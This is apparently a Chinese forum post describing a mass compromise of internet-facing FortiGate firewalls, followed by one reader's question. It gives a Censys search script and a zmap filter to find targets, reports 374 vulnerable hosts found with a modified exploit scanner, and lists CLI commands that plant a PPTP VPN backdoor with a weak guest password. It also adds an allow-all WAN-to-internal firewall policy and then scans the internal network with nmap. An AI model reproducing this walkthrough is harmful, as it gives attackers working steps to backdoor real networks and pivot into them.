通过 censys 拉去了 50 页面的结果
通过
443.https.tls.certificate.parsed.subject.organizational_unit: FortiGate
关键字
使用官方的 api 进行拉取,脚本如下:
import sys
import json
import requests
API_URL = "https://www.censys.io/api/v1"
UID = "0"
SECRET = "0"
def get(page):
data = {
"query":"443.https.tls.certificate.parsed.subject.organizational_unit: FortiGate",
"page":int(page),
"fields":["ip"]
}
res = requests.post(API_URL + "/search/ipv4", data=json.dumps(data), auth=(UID, SECRET)).text
#print res
results = json.loads(res)
for result in results["results"]:
print "%s" % (result["ip"])
for i in range(1,50):
get(i)
原始数据长度:
[root@xunzh 8]# cat ip.txt |wc
4900 4900 74466
[root@xunzh 8]#
通过 zmap 进行数据筛选
zmap -p 22 --whitelist-file ip.txt -o out.txt
最终剩下
[root@xunzh 8]# cat out.txt |wc
1150 1150 16323
通过修改原始测试脚本进行测试,添加多线程模块
使用方法:
python scan.py input.txt
扫描结果是存在 374 台漏洞机器,大约站了原始数据的 13 分之一 1 ,如果按照这个数量来计算,全网大约有 5000 台以上机器收到影响,将漏洞主机标注在地图上,结果大致如下:
先看下用户组
show user group
config vpn pptp
set status enable
set eip 192.168.200.100
set sip 192.168.200.1
set usrgrp Guest-group
end
config user local
edit "guest"
set type password
set passwd 123456
next
end
config user group
edit "Guest-group"
set profile "unfiltered"
set member "guest"
next
end
config firewall policy
edit 9
set srcintf "wan1"
set dstintf "internal"
set srcaddr "all"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
next
end
如果执行完毕和上图一样,没有出现任何错误便是成功了,然后在本机新增一个 pptp 的 vpn 链接即可。
拨号进入内网以后便可以对内网进行渗透了,具体方法就不详细描述了!
查看路由表
get router info routing-table all
这里已经成功连接上,并使用 nmap 扫描,这里记得你是防火墙 root ,所以你想去哪就去哪,想干嘛就干嘛。
来源:
1
clino 2016-01-13 16:22:42 +08:00
这个防火墙是干什么的? 用户很多吗?
|